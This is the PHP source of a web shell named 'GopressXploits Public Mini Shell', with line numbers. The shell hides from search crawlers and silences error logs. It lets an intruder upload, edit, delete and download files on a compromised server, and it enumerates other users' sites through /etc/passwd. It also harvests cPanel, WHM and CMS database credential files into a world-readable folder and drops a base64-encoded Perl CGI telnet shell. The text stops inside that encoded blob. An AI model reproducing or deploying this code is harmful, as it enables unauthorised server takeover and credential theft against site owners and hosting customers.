<?php//NOCHANGE YA SAYANG :*//Greetz Mr.CeRoS404 <= he Make this shell

1. <?php
2.  
3. //NOCHANGE YA SAYANG :*
4.  
5. //Greetz Mr.CeRoS404 <= he Make this shell
6.  
7. //and Me :'v
8.  
9. //Dont Change The Copyright Please :)
10.  
11. //although only recode at least I've been trying to make this shell
12.  
13. //dont Judge Please im newbie :)
14.  
15. session_start();
16.  
17. error_reporting(0);
18.  
19. set_time_limit(0);
20.  
21. @set_magic_quotes_runtime(0);
22.  
23. @clearstatcache();
24.  
25. @ini_set('error_log',NULL);
26.  
27. @ini_set('log_errors',0);
28.  
29. @ini_set('max_execution_time',0);
30.  
31. @ini_set('output_buffering',0);
32.  
33. @ini_set('display_errors', 0);
34.  
35. $KeyMasuk = "ee1bc0688750cd9a96802766d3641b26";
36.  
37. $color = "#00ff00";
38.  
39. $default_action = 'FilesMan';
40.  
41. $default_use_ajax = true;
42.  
43. $default_charset = 'UTF-8';
44.  
45. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
46.  
47. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
48.  
49. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
50.  
51. header('HTTP/1.0 404 Not Found');
52.  
53. exit;
54.  
55. }
56.  
57. }
58.  
59. function login_shell() {
60.  
61. if($_POST['submit']){
62.  
63. switch ($_POST['method']) {
64.  
65. case '1':
66.  
67. echo d3cryptR4ns0mw4r3::m3d1rs(d3cryptR4ns0mw4r3::locate(),"1",$_POST['pass']);
68.  
69. break;
70.  
71. case '2':
72.  
73. echo d3cryptR4ns0mw4r3::m3d1rs(d3cryptR4ns0mw4r3::locate(),"2",$_POST['pass']);
74.  
75. break;
76.  
77. }
78.  
79. }
80.  
81. ?>
82.  
83. <html>
84.  
85. <style type="text/css">
86.  
87. @import url(https://fonts.googleapis.com/css?family=Oxygen);
88.  
89. body {
90.  
91. background: b
92.  
93. font-family: 'Oxygen';
94.  
95. color: #e2e2e2;
96.  
97. }
98.  
99. .subimit{
100.  
101. border-color: red;
102.  
103. background-color: transparent;
104.  
105. color: white;
106.  
107. }
108.  
109. .submite{
110.  
111. border-style: dotted;
112.  
113. border-color: #4CAF50;
114.  
115. background-color: transparent;
116.  
117. color: red;
118.  
119. }
120.  
121. </style>
122.  
123. <head>
124.  
125. <title>Gxp Shell </title>
126.  
127. <center>
128.  
129. <br><br><br><br><br><br>
130.  
131. <form method="post">
132.  
133. <br><br><br>
134.  
135. <font color="white">Password : </font> <input class="subimit" type="password" name="pass">
136.  
137. <br><br> <input type="submit" name="submit" class="submite" value="MASUK">
138.  
139. </form></center>
140.  
141. <?php
142.  
143. exit;
144.  
145. }
146.  
147. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
148.  
149. if( empty($KeyMasuk) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $KeyMasuk) ) )
150.  
151. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
152.  
153. else
154.  
155. login_shell();
156.  
157. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
158.  
159. $file = $_GET['dl'];
160.  
161. $filez = @file_get_contents($file);
162.  
163. header("Content-type: application/octet-stream");
164.  
165. header("Content-length: ".strlen($filez));
166.  
167. header("Content-disposition: attachment; filename=\"".basename($file)."\";");
168.  
169. echo $filez;
170.  
171. exit;
172.  
173. }
174.  
175. if(get_magic_quotes_gpc()){
176.  
177. foreach($_POST as $key=>$value){
178.  
179. $_POST[$key] = stripslashes($value);
180.  
181. }
182.  
183. }
184.  
185. echo '<!DOCTYPE HTML>
186.  
187. <HTML>
188.  
189. <HEAD>
190.  
191. <link href="https://fonts.googleapis.com/css?family=Ubuntu Mono" rel="stylesheet" type="text/css">
192.  
193. <title>GOPRESSXPLOITS</title>
194.  
195. <style>
196.  
197. body{
198.  
199. background-attachment:fixed;
200.  
201. -webkit-background-size: cover;
202.  
203. -moz-background-size: cover;
204.  
205. -o-background-size: cover;
206.  
207. background-size: cover;
208.  
209. font-family: "Ubuntu Mono";
210.  
211. color: green;
212.  
213. text-shadow:0px 0px 1px #757575;
214.  
215. }
216.  
217. #content tr:hover{
218.  
219. background-color: #636263;
220.  
221. text-shadow:0px 0px 10px #fff;
222.  
223. }
224.  
225. #content .first{
226.  
227. background-color: silver;
228.  
229. }
230.  
231. #content .first:hover{
232.  
233. background-color: silver;
234.  
235. text-shadow:0px 0px 1px #757575;
236.  
237. }
238.  
239. table{
240.  
241. border: 1px #000000 dotted;
242.  
243. }
244.  
245. H1{
246.  
247. font-family: "Rye", cursive;
248.  
249. }
250.  
251. a{
252.  
253. color: green;
254.  
255. text-decoration: none;
256.  
257. }
258.  
259. a:hover{
260.  
261. color: green;
262.  
263. text-shadow:0px 0px 10px #FF00FF;
264.  
265. }
266.  
267. input,select,textarea{
268.  
269. border: 1px #000000 solid;
270.  
271. -moz-border-radius: 5px;
272.  
273. -webkit-border-radius:5px;
274.  
275. border-radius:5px;
276.  
277. }
278.  
279. </style>
280.  
281. </HEAD>
282.  
283. <BODY>
284.  
285. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
286.  
287. <tr><td>';
288.  
289. echo "<br>";
290.  
291. echo "<br>";
292.  
293. echo "<center> GopressXploits Public Mini Shell V.1 </center>";
294.  
295. echo "<br>";
296.  
297. echo "System: ".php_uname()."<br>";
298.  
299. echo "<br>";
300.  
301. //INI MENU NYA DANCUK, JANGAN DI UBAH
302.  
303. echo "<a href='?'>[ HOME ]</a>";
304.  
305. echo "<a href='?path=$path&opt=jumping'> [ Jumping ]</a>";
306.  
307. echo "<a href='?path=$path&opt=config'> [ Config ]</a>";
308.  
309. echo "<a href='?path=$path&opt=adminer'> [ Adminer ]</a>";
310.  
311. echo "<a href='?path=$path&opt=mass_deface'> [ Mass ]</a>";
312.  
313. echo "<a href='?path=$path&opt=cgi'> [ Cgi T3ln3t ]</a>";
314.  
315. echo "<a href='?path=$path&opt=dos'> [ Domain ]</a><br>";
316.  
317. echo "<center>";
318.  
319. echo "<a style='color: red;' href='?logout=true'> [ Logout ]</a>";
320.  
321. echo "</center>";
322.  
323. echo "<br>";
324.  
325. echo "Current Path : ";
326.  
327. if(isset($_GET['path'])){
328.  
329. $path = $_GET['path'];
330.  
331. }else{
332.  
333. $path = getcwd();
334.  
335. }
336.  
337. $path = str_replace('\\','/',$path);
338.  
339. $paths = explode('/',$path);
340.  
341. foreach($paths as $id=>$pat){
342.  
343. if($pat == '' && $id == 0){
344.  
345. $a = true;
346.  
347. echo '<a href="?path=/">/</a>';
348.  
349. continue;
350.  
351. }
352.  
353. if($pat == '') continue;
354.  
355. echo '<a href="?path=';
356.  
357. for($i=0;$i<=$id;$i++){
358.  
359. echo "$paths[$i]";
360.  
361. if($i != $id) echo "/";
362.  
363. }
364.  
365. echo '">'.$pat.'</a>/';
366.  
367. }
368.  
369. echo '</td></tr><tr><td>';
370.  
371. echo "<br>";
372.  
373. if(isset($_FILES['file'])){
374.  
375. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
376.  
377. echo '<font color="#FFB6C1">Succes</font><br />';
378.  
379. }else{
380.  
381. echo '<font color="#87CEFA">Error</font><br />';
382.  
383. }
384.  
385. }
386.  
387. echo '<form enctype="multipart/form-data" method="POST"><font color="#FF1493">
388.  
389. Upload File<input type="file" name="file" />
390.  
391. <input type="submit" value="Uploads ! " />
392.  
393. </form>
394.  
395. </td></tr>';
396.  
397. if(isset($_GET['filesrc'])){
398.  
399. echo "<tr><td>Current File : ";
400.  
401. echo $_GET['filesrc'];
402.  
403. echo '</tr></td></table><br />';
404.  
405. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
406.  
407. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
408.  
409. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
410.  
411. if($_POST['opt'] == 'chmod'){
412.  
413. if(isset($_POST['perm'])){
414.  
415. if(chmod($_POST['path'],$_POST['perm'])){
416.  
417. echo '<font color="#FFA500">Change Permission Done Yupz</font><br />';
418.  
419. }else{
420.  
421. echo '<font color="#DA70D6">Change Permission Error</font><br />';
422.  
423. }
424.  
425. }
426.  
427. echo '<form method="POST">
428.  
429. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
430.  
431. <input type="hidden" name="path" value="'.$_POST['path'].'">
432.  
433. <input type="hidden" name="opt" value="chmod">
434.  
435. <input type="submit" value="Go" />
436.  
437. </form>';
438.  
439. }
440.  
441. elseif($_POST['opt'] == 'rename'){
442.  
443. if(isset($_POST['newname'])){
444.  
445. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
446.  
447. echo '<font color="#DA70D6">Change Name Done Yupz</font><br />';
448.  
449. }else{
450.  
451. echo '<font color="#FFEFD5">Change Name Error</font><br />';
452.  
453. }
454.  
455. $_POST['name'] = $_POST['newname'];
456.  
457. }
458.  
459. echo '<form method="POST">
460.  
461. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
462.  
463. <input type="hidden" name="path" value="'.$_POST['path'].'">
464.  
465. <input type="hidden" name="opt" value="rename">
466.  
467. <input type="submit" value="Go" />
468.  
469. </form>';
470.  
471. }
472.  
473. elseif($_POST['opt'] == 'edit'){
474.  
475. if(isset($_POST['src'])){
476.  
477. $fp = fopen($_POST['path'],'w');
478.  
479. if(fwrite($fp,$_POST['src'])){
480.  
481. echo '<font color="#FFEFD5">Edit File Done Yupz</font><br />';
482.  
483. }else{
484.  
485. echo '<font color="#FFDEAD">Edit File Error</font><br />';
486.  
487. }
488.  
489. fclose($fp);
490.  
491. }
492.  
493. echo '<form method="POST">
494.  
495. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
496.  
497. <input type="hidden" name="path" value="'.$_POST['path'].'">
498.  
499. <input type="hidden" name="opt" value="edit">
500.  
501. <input type="submit" value="Go" />
502.  
503. </form>';
504.  
505. }
506.  
507. echo '</center>';
508.  
509. }else{
510.  
511. echo '</table><br /><center>';
512.  
513. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
514.  
515. if($_POST['type'] == 'dir'){
516.  
517. if(rmdir($_POST['path'])){
518.  
519. echo '<font color="#E0FFFF">Delete Dir Done Yupz</font><br />';
520.  
521. }else{
522.  
523. echo '<font color="#FAFAD2">Delete Dir Error</font><br />';
524.  
525. }
526.  
527. }elseif($_POST['type'] == 'file'){
528.  
529. if(unlink($_POST['path'])){
530.  
531. echo '<font color="#FF69B4">Delete File Done Yupz</font><br />';
532.  
533. }else{
534.  
535. echo '<font color="#ADFF2F">Delete File Error</font><br />';
536.  
537. }
538.  
539. }
540.  
541. }
542.  
543. echo '</center>';
544.  
545. $scandir = scandir($path);
546.  
547. echo '<div id="content"><table width="1300" border="0" cellpadding="3" cellspacing="1" align="center">
548.  
549. <tr class="first">
550.  
551. <td><center>Name</center></td>
552.  
553. <td><center>Size</center></td>
554.  
555. <td><center>Permissions</center></td>
556.  
557. <td><center>Options</center></td>
558.  
559. </tr>';
560.  
561. foreach($scandir as $dir){
562.  
563. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
564.  
565. echo "<tr>
566.  
567. <td><a href=\"?path=$path/$dir\">$dir</a></td>
568.  
569. <td><center>--</center></td>
570.  
571. <td><center>";
572.  
573. if(is_writable("$path/$dir")) echo '<font color="#00BFFF">';
574.  
575. elseif(!is_readable("$path/$dir")) echo '<font color="#FFE4E1">';
576.  
577. echo perms("$path/$dir");
578.  
579. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
580.  
581. echo "</center></td>
582.  
583. <td><center><form method=\"POST\" action=\"?option&path=$path\">
584.  
585. <select name=\"opt\">
586.  
587. <option value=\"\"></option>
588.  
589. <option value=\"delete\">Delete</option>
590.  
591. <option value=\"chmod\">Chmod</option>
592.  
593. <option value=\"rename\">Rename</option>
594.  
595. </select>
596.  
597. <input type=\"hidden\" name=\"type\" value=\"dir\">
598.  
599. <input type=\"hidden\" name=\"name\" value=\"$dir\">
600.  
601. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
602.  
603. <input type=\"submit\" value=\">\" />
604.  
605. </form></center></td>
606.  
607. </tr>";
608.  
609. }
610.  
611. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
612.  
613. foreach($scandir as $file){
614.  
615. if(!is_file("$path/$file")) continue;
616.  
617. $size = filesize("$path/$file")/1024;
618.  
619. $size = round($size,3);
620.  
621. if($size >= 1024){
622.  
623. $size = round($size/1024,2).' MB';
624.  
625. }else{
626.  
627. $size = $size.' KB';
628.  
629. }
630.  
631. echo "<tr>
632.  
633. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
634.  
635. <td><center>".$size."</center></td>
636.  
637. <td><center>";
638.  
639. if(is_writable("$path/$file")) echo '<font color="#FF00FF">';
640.  
641. elseif(!is_readable("$path/$file")) echo '<font color="FFE4E1">';
642.  
643. echo perms("$path/$file");
644.  
645. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
646.  
647. echo "</center></td>
648.  
649. <td><center><form method=\"POST\" action=\"?option&path=$path\">
650.  
651. <select name=\"opt\">
652.  
653. <option value=\"\"></option>
654.  
655. <option value=\"delete\">Delete</option>
656.  
657. <option value=\"chmod\">Chmod</option>
658.  
659. <option value=\"rename\">Rename</option>
660.  
661. <option value=\"edit\">Edit</option>
662.  
663. </select>
664.  
665. [ <a href=\"?y=$path&amp;dl=$path/$file\">download</a> ]
666.  
667. <input type=\"hidden\" name=\"type\" value=\"file\">
668.  
669. <input type=\"hidden\" name=\"name\" value=\"$file\">
670.  
671. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
672.  
673. <input type=\"submit\" value=\">\" />
674.  
675. </form></center></td>
676.  
677. </tr>";
678.  
679. }
680.  
681. if($_GET['opt'] == 'jumping') {
682.  
683. $i = 0;
684.  
685. $ip = gethostbyname($_SERVER['HTTP_HOST']);
686.  
687. echo "<div class='margin: 5px auto;'>";
688.  
689. if(preg_match("/hsphere/", $dir)) {
690.  
691. $urls = explode("\r\n", $_POST['url']);
692.  
693. if(isset($_POST['jump'])) {
694.  
695. echo "<pre>";
696.  
697. foreach($urls as $url) {
698.  
699. $url = str_replace(array("http://","www."), "", strtolower($url));
700.  
701. $etc = "/etc/passwd";
702.  
703. $f = fopen($etc,"r");
704.  
705. while($gets = fgets($f)) {
706.  
707. $pecah = explode(":", $gets);
708.  
709. $user = $pecah[0];
710.  
711. $dir_user = "/hsphere/local/home/$user";
712.  
713. if(is_dir($dir_user) === true) {
714.  
715. $url_user = $dir_user."/".$url;
716.  
717. if(is_readable($url_user)) {
718.  
719. $i++;
720.  
721. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
722.  
723. if(is_writable($url_user)) {
724.  
725. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
726.  
727. }
728.  
729. echo $jrw."<br>";
730.  
731. }
732.  
733. }
734.  
735. }
736.  
737. }
738.  
739. if($i == 0) {
740.  
741. } else {
742.  
743. echo "<br>Total ada ".$i." Kamar di ".$ip;
744.  
745. }
746.  
747. echo "</pre>";
748.  
749. } else {
750.  
751. echo '<center>
752.  
753. <form method="post">
754.  
755. List Domains: <br>
756.  
757. <textarea name="url" style="width: 500px; height: 250px;">';
758.  
759. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
760.  
761. while($getss = fgets($fp)) {
762.  
763. echo $getss;
764.  
765. }
766.  
767. echo '</textarea><br>
768.  
769. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
770.  
771. </form></center>';
772.  
773. }
774.  
775. }
776.  
777. elseif(preg_match("/vhosts|vhost/", $dir)) {
778.  
779. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
780.  
781. $urls = explode("\r\n", $_POST['url']);
782.  
783. if(isset($_POST['jump'])) {
784.  
785. echo "<pre>";
786.  
787. foreach($urls as $url) {
788.  
789. $url = str_replace("www.", "", $url);
790.  
791. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
792.  
793. if(is_dir($web_vh) === true) {
794.  
795. if(is_readable($web_vh)) {
796.  
797. $i++;
798.  
799. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
800.  
801. if(is_writable($web_vh)) {
802.  
803. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
804.  
805. }
806.  
807. echo $jrw."<br>";
808.  
809. }
810.  
811. }
812.  
813. }
814.  
815. if($i == 0) {
816.  
817. } else {
818.  
819. echo "<br>Total ada ".$i." Kamar di ".$ip;
820.  
821. }
822.  
823. echo "</pre>";
824.  
825. } else {
826.  
827. echo '<center>
828.  
829. <form method="post">
830.  
831. List Domains: <br>
832.  
833. <textarea name="url" style="width: 500px; height: 250px;">';
834.  
835. bing("ip:$ip");
836.  
837. echo '</textarea><br>
838.  
839. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
840.  
841. </form></center>';
842.  
843. }
844.  
845. } else {
846.  
847. echo "<pre>";
848.  
849. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
850.  
851. while($passwd = fgets($etc)) {
852.  
853. if($passwd == '' || !$etc) {
854.  
855. echo "<font color=red>Can't read /etc/passwd</font>";
856.  
857. } else {
858.  
859. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
860.  
861. foreach($user_jumping[1] as $user_idx_jump) {
862.  
863. $user_jumping_dir = "/home/$user_idx_jump/public_html";
864.  
865. if(is_readable($user_jumping_dir)) {
866.  
867. $i++;
868.  
869. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
870.  
871. if(is_writable($user_jumping_dir)) {
872.  
873. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
874.  
875. }
876.  
877. echo $jrw;
878.  
879. if(function_exists('posix_getpwuid')) {
880.  
881. $domain_jump = file_get_contents("/etc/named.conf");
882.  
883. if($domain_jump == '') {
884.  
885. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
886.  
887. } else {
888.  
889. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
890.  
891. foreach($domains_jump[1] as $dj) {
892.  
893. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
894.  
895. $user_jumping_url = $user_jumping_url['name'];
896.  
897. if($user_jumping_url == $user_idx_jump) {
898.  
899. echo " => ( <u>$dj</u> )<br>";
900.  
901. break;
902.  
903. }
904.  
905. }
906.  
907. }
908.  
909. } else {
910.  
911. echo "<br>";
912.  
913. }
914.  
915. }
916.  
917. }
918.  
919. }
920.  
921. }
922.  
923. if($i == 0) {
924.  
925. } else {
926.  
927. echo "<br>Total ada ".$i." Kamar di ".$ip;
928.  
929. }
930.  
931. echo "</pre>";
932.  
933. }
934.  
935. echo "</div>";
936.  
937. }
938.  
939. elseif($_GET['logout'] == true) {
940.  
941. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
942.  
943. echo "<script>window.location='?';</script>";
944.  
945. }
946.  
947. elseif($_GET['opt'] == 'dos') {
948.  
949. $all = array();
950.  
951. // domain finder.
952.  
953. $d0mains = file('/etc/named.conf');
954.  
955. $domains = scandir("/var/named");
956.  
957. if($domains or $d0mains){
958.  
959. $count = 0;
960.  
961. if($domains){
962.  
963. echo "<center><h1>Count Domains on user</h1></center><br><br>";
964.  
965. $cur = array();
966.  
967. foreach($domains as $domain){
968.  
969. if(strpos($domain, '.db')){
970.  
971. $dom = str_replace('.db', '', $domain);
972.  
973. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
974.  
975. $user = $own['name'];
976.  
977. $all[$user][] = $dom;
978.  
979. //echo "$user: $dom<br/>";
980.  
981. }
982.  
983. }
984.  
985. echo "";
986.  
987. }
988.  
989. elseif($d0mains){
990.  
991. $mck = array();
992.  
993. foreach($d0mains as $domain){
994.  
995. preg_match_all('#zone "(.*)"#',$domain,$dom);
996.  
997. flush();
998.  
999. if(strlen(trim($domain[1][0])) >2){
1000.  
1001. $mck[] = $dom[1][0];
1002.  
1003. }
1004.  
1005. }
1006.  
1007.  
1008.  
1009. $mck = array_unique($mck);
1010.  
1011. foreach($mck as $dom){
1012.  
1013. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
1014.  
1015. $user = $own['name'];
1016.  
1017. $all[$user][] = $dom;
1018.  
1019. //echo "$user: $dom<br/>";
1020.  
1021. }
1022.  
1023. echo "";
1024.  
1025. }
1026.  
1027. }
1028.  
1029. foreach($all as $user => $domain){
1030.  
1031. echo "<center>User <font color='red'>$user</font> has <font color='red'>".count($domain)."</font> Domains below :<br></center>";
1032.  
1033. echo "<center>---------------<br>";
1034.  
1035. foreach($domain as $v){
1036.  
1037. echo "<center><a href='http://$v/' target='_blank'>http://$v<a><br></center>";
1038.  
1039. }
1040.  
1041. echo "<center>---------------";
1042.  
1043. echo "<br><br>";
1044.  
1045. }
1046.  
1047. } elseif($_GET['opt'] == 'config') {
1048.  
1049. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
1050.  
1051. $idx = mkdir("gxp_config", 0777);
1052.  
1053. $isi_htc = "Options all\nRequire None\nSatisfy Any";
1054.  
1055. $htc = fopen("gxp_config/.htaccess","w");
1056.  
1057. fwrite($htc, $isi_htc);
1058.  
1059. while($passwd = fgets($etc)) {
1060.  
1061. if($passwd == "" || !$etc) {
1062.  
1063. echo "<font color=red>Can't read /etc/passwd</font>";
1064.  
1065. } else {
1066.  
1067. preg_match_all('/(.*?):x:/', $passwd, $user_config);
1068.  
1069. foreach($user_config[1] as $user_noname) {
1070.  
1071. $user_config_dir = "/home/$user_noname/public_html/";
1072.  
1073. if(is_readable($user_config_dir)) {
1074.  
1075. $grab_config = array(
1076.  
1077. "/home/$user_noname/.my.cnf" => "cpanel",
1078.  
1079. "/home/$user_noname/.accesshash" => "WHM-accesshash",
1080.  
1081. "/home/$user_noname/public_html/vdo_config.php" => "Voodoo",
1082.  
1083. "/home/$user_noname/public_html/bw-configs/config.ini" => "BosWeb",
1084.  
1085. "/home/$user_noname/public_html/config/koneksi.php" => "Lokomedia",
1086.  
1087. "/home/$user_noname/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1088.  
1089. "/home/$user_noname/public_html/clientarea/configuration.php" => "WHMCS",
1090.  
1091. "/home/$user_noname/public_html/whm/configuration.php" => "WHMCS",
1092.  
1093. "/home/$user_noname/public_html/whmcs/configuration.php" => "WHMCS",
1094.  
1095. "/home/$user_noname/public_html/forum/config.php" => "phpBB",
1096.  
1097. "/home/$user_noname/public_html/sites/default/settings.php" => "Drupal",
1098.  
1099. "/home/$user_noname/public_html/config/settings.inc.php" => "PrestaShop",
1100.  
1101. "/home/$user_noname/public_html/app/etc/local.xml" => "Magento",
1102.  
1103. "/home/$user_noname/public_html/joomla/configuration.php" => "Joomla",
1104.  
1105. "/home/$user_noname/public_html/configuration.php" => "Joomla",
1106.  
1107. "/home/$user_noname/public_html/wp/wp-config.php" => "WordPress",
1108.  
1109. "/home/$user_noname/public_html/wordpress/wp-config.php" => "WordPress",
1110.  
1111. "/home/$user_noname/public_html/wp-config.php" => "WordPress",
1112.  
1113. "/home/$user_noname/public_html/admin/config.php" => "OpenCart",
1114.  
1115. "/home/$user_noname/public_html/slconfig.php" => "Sitelok",
1116.  
1117. "/home/$user_noname/public_html/application/config/database.php" => "Ellislab");
1118.  
1119. foreach($grab_config as $config => $nama_config) {
1120.  
1121. $ambil_config = file_get_contents($config);
1122.  
1123. if($ambil_config == '') {
1124.  
1125. } else {
1126.  
1127. $file_config = fopen("gxp_config/$user_noname-$nama_config.txt","w");
1128.  
1129. fputs($file_config,$ambil_config);
1130.  
1131. }
1132.  
1133. }
1134.  
1135. }
1136.  
1137. }
1138.  
1139. }
1140.  
1141. }
1142.  
1143. echo "<center><a href='?dir=$path/gxp_config'><font color=blue>Done</font></a></center>";
1144.  
1145. }
1146.  
1147. elseif($_GET['opt'] == 'adminer') {
1148.  
1149. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
1150.  
1151. function adminer($url, $isi) {
1152.  
1153. $fp = fopen($isi, "w");
1154.  
1155. $ch = curl_init();
1156.  
1157. curl_setopt($ch, CURLOPT_URL, $url);
1158.  
1159. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1160.  
1161. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1162.  
1163. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1164.  
1165. curl_setopt($ch, CURLOPT_FILE, $fp);
1166.  
1167. return curl_exec($ch);
1168.  
1169. curl_close($ch);
1170.  
1171. fclose($fp);
1172.  
1173. ob_flush();
1174.  
1175. flush();
1176.  
1177. }
1178.  
1179. if(file_exists('adminer.php')) {
1180.  
1181. echo "<center><font color=lime><a href='$full/adminer.php' color=#FF1493 target='_blank'>MySQL Login</a></font></center>";
1182.  
1183. } else {
1184.  
1185. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1186.  
1187. echo "<center><font color=lime><a href='$full/adminer.php' color=#FF1493 target='_blank'>MySQL Login</a></font></center>";
1188.  
1189. } else {
1190.  
1191. echo "<center><font color=red>gagal buat file adminer</font></center>";
1192.  
1193. }
1194.  
1195. }
1196.  
1197. }
1198.  
1199. elseif($_GET['opt'] == 'cgi') {
1200.  
1201. echo "<center/><br/><b><font color=blue>+--==[ CGI T3ln3t ]==--+ </font></b><br><br>";
1202.  
1203. mkdir('cgitelnet1', 0755);
1204.  
1205. chdir('cgitelnet1');
1206.  
1207. $kokdosya = ".htaccess";
1208.  
1209. $dosya_adi = "$kokdosya";
1210.  
1211. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
1212.  
1213. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
1214.  
1215. AddType application/x-httpd-cgi .cin
1216.  
1217. AddHandler cgi-script .cin
1218.  
1219. AddHandler cgi-script .cin";
1220.  
1221. fwrite ( $dosya , $metin ) ;
1222.  
1223. fclose ($dosya);
1224.  
1225. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRo